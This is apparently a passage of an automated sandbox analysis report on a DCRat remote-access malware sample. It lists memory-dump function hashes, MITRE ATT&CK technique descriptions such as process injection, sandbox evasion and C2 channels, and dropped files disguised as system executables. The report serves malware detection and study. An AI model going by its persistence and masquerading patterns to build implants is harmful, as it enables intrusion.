Opcode Fuzzy Hash: fc5799ead8d87a3736999037117f731c625ae4d8730c5d7c83e361622ffae996
Instruction Fuzzy Hash: DB017571A0956E8FE791EB2C84892B9BBE0FF9C704F6505B5E008C7093DD78A445CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E01D0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0154f35b168408857b2f1e135e9a2536109657973381a5523935467b20262406
Instruction ID: 924c998b24947f3f6c83d8dbba4d58dc0d166d0f0cceef5624108a916d25330e
Opcode Fuzzy Hash: 0154f35b168408857b2f1e135e9a2536109657973381a5523935467b20262406
Instruction Fuzzy Hash: AA015E3094851E8FDB98EF28C4566BEB7E1EF5C715FA0417ED40EC2192CA35A591CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F1FAA Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ffd7e3d9691cf2de3146787e545f6882e1c6a0d6c3ce3ff6ca6109d38f444ff
Instruction ID: 07d96c7901e8a2440db0b46f2bb8591bd8e143adada1e8264f4dfd5a32f6fb7d
Opcode Fuzzy Hash: 3ffd7e3d9691cf2de3146787e545f6882e1c6a0d6c3ce3ff6ca6109d38f444ff
Instruction Fuzzy Hash: 8E11613590D57ECEE751EB7C84485EABBE0FF29701F4449BAD408C7062EB30A541C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F1905 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6ea5f77df0ae4e0a7307d5900288643756563afd44c5d954d7534e2219009a
Instruction ID: 50d94c444489ef18bc7567452669df94b689caa57335d75ec1905088fd391893
Opcode Fuzzy Hash: 3e6ea5f77df0ae4e0a7307d5900288643756563afd44c5d954d7534e2219009a
Instruction Fuzzy Hash: D801BC3180C6ADCFDB88EB2884992FA7BE0EF59704F5004BED40EC6192EE35A541C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E27AD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782497a58c859e5bbbbb9d7003a45c5d197685828a8d272489fc7f778e6215ff
Instruction ID: f4cca9f219c1ead5643dcc26334db3119d9192b39bd755e2be17849ca4ccc67a
Opcode Fuzzy Hash: 782497a58c859e5bbbbb9d7003a45c5d197685828a8d272489fc7f778e6215ff
Instruction Fuzzy Hash: 5C017C3095C65E8FEB51EF2888481E9BBE4EF59701F4145BAE408C6093EF34E555C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F6C29 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 572f853185ebcfd8eb844b9325648a0562598a7fa13b7798d6e4e030295dd45a
Instruction ID: f3bd98cc6229729e73ebcd1e7879cbd4b0398dcde351edf2519b1e94478e1ed6
Opcode Fuzzy Hash: 572f853185ebcfd8eb844b9325648a0562598a7fa13b7798d6e4e030295dd45a
Instruction Fuzzy Hash: 00018830D0D66D8FD752AB3884592AA7FF0EF55700F4504F7D04CC70A3E925A544C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E2E49 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ef07b0fa9e00d4aaba7379d60057a7f68769f152f95e207bfe1d3a1426a3040
Instruction ID: 641656ce432efd24a8c923e64971655438307d38a7c263c27e09000629a1429d
Opcode Fuzzy Hash: 8ef07b0fa9e00d4aaba7379d60057a7f68769f152f95e207bfe1d3a1426a3040
Instruction Fuzzy Hash: E401843180D6AD8FE752EB38844D1A97BE4EF5E700F5605F3D408CB0A3DA38A445C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EA329 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93f352b66c378d48c0e6806d07efb6d37365f896f1416e11825b3874d5c6d324
Instruction ID: 2ecb1c03f4ec06e1cdd426a594b1937cc9f446de50605ad25b135f2159d51896
Opcode Fuzzy Hash: 93f352b66c378d48c0e6806d07efb6d37365f896f1416e11825b3874d5c6d324
Instruction Fuzzy Hash: 0B01713194D69E8FEB51EB3888591A9BBE0EF5A700F5508F6D408CB0A3ED68A445C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F739D Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b42a74bca1e9552f8d6dca69e83e1f2d7d321d8a3c7c83476671c9dcce58b29f
Instruction ID: 5147d376f262de6378ead0396f9ecfa36380f901027e119fba4ceec1e68251a3
Opcode Fuzzy Hash: b42a74bca1e9552f8d6dca69e83e1f2d7d321d8a3c7c83476671c9dcce58b29f
Instruction Fuzzy Hash: 87019E3080D6AE9FEB59EF28C49A1BA7BA0FF55704F1104BED809CB092EA75A541C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E08EF Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23cd70d08285dd0b3fa8164157e8500d6e6b40257d2bb15f3fc8cc22a524a7c4
Instruction ID: 252bd4b1fb1f2cb536b70d69081c0e6e913e34d099dc557abbc851cd38aa9339
Opcode Fuzzy Hash: 23cd70d08285dd0b3fa8164157e8500d6e6b40257d2bb15f3fc8cc22a524a7c4
Instruction Fuzzy Hash: 3E018F72E0891D4EEF48EB6884996EDF7E1FF1C710F054179E009D7097CE24A8468750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E0208 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c37d27408400aa2639a72b0e7977159f76773db56a52980c74927987f2ca51
Instruction ID: 080370dc049e14769497374e3e273f16205d8e1baacabd9369a7a0e08ad528e2
Opcode Fuzzy Hash: b5c37d27408400aa2639a72b0e7977159f76773db56a52980c74927987f2ca51
Instruction Fuzzy Hash: 85016D3085861E8AEB58EB2884582BAB7E4FF1C705F50047EE40EC6192DF75A551C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E0200 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5cbd2e358aa301a2be012549d6ed88d04ae26cc7b131220535e878824c75b7
Instruction ID: 87d8dee7e733342d9eabb3309973c0f454bcf5672622687f763c593e4b9c339e
Opcode Fuzzy Hash: 7d5cbd2e358aa301a2be012549d6ed88d04ae26cc7b131220535e878824c75b7
Instruction Fuzzy Hash: 9901813095852E8BEB58EF28C4596BAB7E4FF1C709F50047EE40EC21D2DF35A155CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E0D30 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44aeef65755db32a14f4afbd939d7b7d8efb6cb74342d1684bcb74361f863917
Instruction ID: 111cef006b4a768a34e81b1c630bc1d26087cd73024288267de0f31805eca396
Opcode Fuzzy Hash: 44aeef65755db32a14f4afbd939d7b7d8efb6cb74342d1684bcb74361f863917
Instruction Fuzzy Hash: 6CF0DC30A1852E8AEBA5EAAC98083FDB7E0EB59714F00013AE41CC20C2DAB52089C311

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EC248 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d8c2049dd71e709384e2e940e57a468bb0cd682b8906de6d4544aa080bc55f8
Instruction ID: 119ca16dd0d2b91b87b87d6fb3f3b1b7e8eb78461aeae44c5bedc8347f234100
Opcode Fuzzy Hash: 9d8c2049dd71e709384e2e940e57a468bb0cd682b8906de6d4544aa080bc55f8
Instruction Fuzzy Hash: 3B016D35C0C66E8BEF95EF6894091FABBE4FF19710F00053AE81DC2092DF746551C690

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E01C8 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e87632e0be5ed2384c149aeb2cb196b100052b050f827646368862b53c7bafc
Instruction ID: 7fbe12453c6aa97163f4e3f4b3742430566db33d4ada956fa9675e8fdcd627bb
Opcode Fuzzy Hash: 7e87632e0be5ed2384c149aeb2cb196b100052b050f827646368862b53c7bafc
Instruction Fuzzy Hash: CCF0F03084D61ECFEF98EF2894162FAB7E4EF09314F90003AE80DC2192CA35A491CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EBAC3 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384727923.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017ea000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3115bc783187c684a4b1ce2faf7691ae5bb896e9f31f3dd5df4571b416d1094a
Instruction ID: 00e9b453e14e733d6fde95963beb43893c0cf5d9b946368a1e87696327f945ed
Opcode Fuzzy Hash: 3115bc783187c684a4b1ce2faf7691ae5bb896e9f31f3dd5df4571b416d1094a
Instruction Fuzzy Hash: 1FF097A0E1892D9EEF94DB1CC8647BDB7E1FB58B01F5041BA900DD3296DE346A828B14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E184B Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ff37de31ea5aeac91c8a471d1d5a830da0e4d1ea30f95da7beae06bc91fccb5
Instruction ID: 291c5aa59f0eb4cd229a6183b56080aa54062f9449a483b3fb13bf9e29efa0e7
Opcode Fuzzy Hash: 8ff37de31ea5aeac91c8a471d1d5a830da0e4d1ea30f95da7beae06bc91fccb5
Instruction Fuzzy Hash: 0DF0CD3084C64E8EEB98DF2884462BABBE0EF59310F900039E80DC2182DA71A5A1C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F1FA8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc5e42b7585c21db6a4bc82b37e0a77a04cd631a019c202f1f4d1f88c0740ba
Instruction ID: 6e2fd0d8a489d06c317339edae5bf4dfe3c35fa379d3cb7b1e72532c842606e7
Opcode Fuzzy Hash: efc5e42b7585c21db6a4bc82b37e0a77a04cd631a019c202f1f4d1f88c0740ba
Instruction Fuzzy Hash: EEF0AF3180E5BECAEB91EB7C48191FABAE0EF14304F4009BED408C6093EB249445C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E26C9 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e75776605b41927943a6fdc574c8f4dd33d00ad0d56c68a4836ac0fdb815d51
Instruction ID: 052f5ef6865bf7c6aa2cceb95c96a1e249aaf0e8f5fa4370086f6f801ffe953d
Opcode Fuzzy Hash: 7e75776605b41927943a6fdc574c8f4dd33d00ad0d56c68a4836ac0fdb815d51
Instruction Fuzzy Hash: 06F0CD3184D39E8FEB6A9F2888291F97FE4FF0A214F4505BAE858C60D3DB389459C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E273D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384451255.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017e0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c0e2d78e70b16e91195c3b67aa2853f08bdf410e7374dabbacd649088925faf
Instruction ID: ff571c9501aeaf309565fe231b20d9d82bbe98cb03186be8cad47a4ca1254144
Opcode Fuzzy Hash: 0c0e2d78e70b16e91195c3b67aa2853f08bdf410e7374dabbacd649088925faf
Instruction Fuzzy Hash: F5F0243085E78E8FEB98AF2888182B9BBE0FF09701F4004BEE908C20D3DB399451C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F6D19 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23e2e4d5fd608c7786a06a7f938701de2e57ff96f1d29b1d711c69565d348f48
Instruction ID: 044d79f0d1daff799dbe6425241626a4ac8be500ba8b46ce27e8fb2399669eac
Opcode Fuzzy Hash: 23e2e4d5fd608c7786a06a7f938701de2e57ff96f1d29b1d711c69565d348f48
Instruction Fuzzy Hash: 43F0B731D0812DCBEB14DF98C4846FDBBB2EF58725F14112EE405E6286CB786486CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F717C Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.384876032.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffc017f1000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4da169edef07224d136ff1b775c8ed3bf533194d64470b0f94e959b654c5656
Instruction ID: 906aa31b69abde93ad87e0e19cf7d97cb511b6e3bb1a57f45f844638ef2abf0e
Opcode Fuzzy Hash: f4da169edef07224d136ff1b775c8ed3bf533194d64470b0f94e959b654c5656
Instruction Fuzzy Hash: 45F0A531E4862D8BEF04EB98E8814FDBBB5EF58304F505065E00DF7246CA25AA45CBA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report cDouNOFXle.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Recovery\088424020bedd6

C:\Recovery\7a0fd90576e088

C:\Recovery\ShellExperienceHost.exe

C:\Recovery\cc11b995f2a76d

C:\Recovery\conhost.exe

C:\Recovery\explorer.exe

C:\Recovery\f8c8f1285d826b

C:\Recovery\winlogon.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MrsUvRPGeImAhc.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chainsavesref.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

C:\Windows\Help\mui\0409\5f7cc7e87d7637

C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe

C:\Windows\Web\Screen\5f7cc7e87d7637

C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe

C:\comproviderRuntimecommon\9e8d7a4ca61bd9

C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat

Windows Analysis Report
cDouNOFXle.exe

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre